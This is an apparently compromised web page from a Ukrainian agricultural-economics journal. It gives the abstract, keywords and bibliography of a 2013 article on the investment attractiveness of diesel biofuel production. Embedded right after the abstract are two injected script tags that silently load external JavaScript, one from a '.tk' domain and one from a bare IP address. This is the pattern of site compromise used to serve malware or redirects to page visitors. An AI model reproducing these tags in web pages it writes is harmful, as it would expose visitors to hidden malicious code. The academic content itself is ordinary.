ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 620.95
Фінансові відносини та бухгалтерський облік

Інвестиційна привабливість виробництва і використання дизельного біопалива / Голуб Г. А., Лук’янець С. В. // Економіка АПК. - 2013. - № 2 - С. 54

Обґрунтовано необхідність розвитку біологічних видів палива. Проаналізовано сучасний стан роз­витку відновлюваних джерел енергії в Україні та за кордоном, інвестиційну привабливість виробниц­тва і використання дизельного біопалива в умовах сільськогосподарського виробництва. Обґрунтова­но шляхи підвищення ефективності виробництва дизельного біопалива в сільськогосподарських під­приємствах. Відповідно до прийнятої Урядом України державної цільової економічної програми ене- ргоефективності на 2010-2015 роки передбачається подальше сприяння розвитку виробництва енер­гоносіїв із ВДЕ та біопалив. Планується, що з 2015 року частка відновлюваних джерел енергії в енер­гетичному балансі України має бути не менше 10%. Згідно з програмою обсяг фінансування реаліза­ції відповідних проектів із державного бюджету в 2012-2015 роках становитиме 13,81 млрд грн. Рис.: 4. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: відновлювані джерела енергії, біодизельне паливо, інвестиційна привабливість, інвестиції, ріпакова олія, державна підтримка, сільськогосподарські підприємства

Список використаних джерел

 1. Аграрний сектор економіки України (стан і перспективи розвитку) / М.В. Присяжнюк, М.В. Зубець, П.Т. Саблук та ін.; за ред. М.В. Присяжнюка, М.В. Зубця, П.Т. Саблука, В.Я. Месель-Веселяка, М.М. Федорова. - К.: ННЦ ІАЕ, 2011. - 1008 с.
 2. Біологічні ресурси і технології виробництва біопалива: моногр. / Я.Б. Блюм, Г.Г. Гелетуха, І.П. Григорюк та ін. - К.: "Аграр Медіа Груп", 2010. - 408 с.
 3. Біопаливні спроби [Електронний ресурс]. - Режим доступу: http://news.finance.ua.
 4. Голуб Г.А. Економічна ефективність виробництва олії в сільськогосподарських підприємствах / Г.А. Голуб, С.В. Лук’янець // Економіка АПК. - 2012. - № 4. - С. 14-18.
 5. Энергетика в мире [Електронний ресурс]. - Режим доступу: http://www.renewable.com.ua
 6. Інвестиції в аграрний сектор [Електронний ресурс]. - Режим доступу: http://www.agroinvest.org.ua/.
 7. Инвестиции в ВИЭ [Електронний ресурс]. - Режим доступу: http://aenergy.ru/4007.
 8. МарчакД. Масса альтернатив / Д. Марчак // Инвестгазета. - 2012. - 19 апр. - № 16.
 9. Место биоэнергетики в проекте обновленной энергетической стратегии Украины до 2030 года // Аналитическая записка - Гелетуха ГГ., Железная Т.А - 18 окт. 2012 года [Електронний ресурс]. - http://www.qclub.org.ua/wp-content/uploads.
 10. Національний банк України [Електронний ресурс]. - http://www.bank.gov.ua.
 11. Сільське господарство України // Стат. зб.; за ред. Ю.М. Остапчука. - К.: Державна служба статистики України, 2011. - 370 с.
Читати статтю: 13_02_09.pdf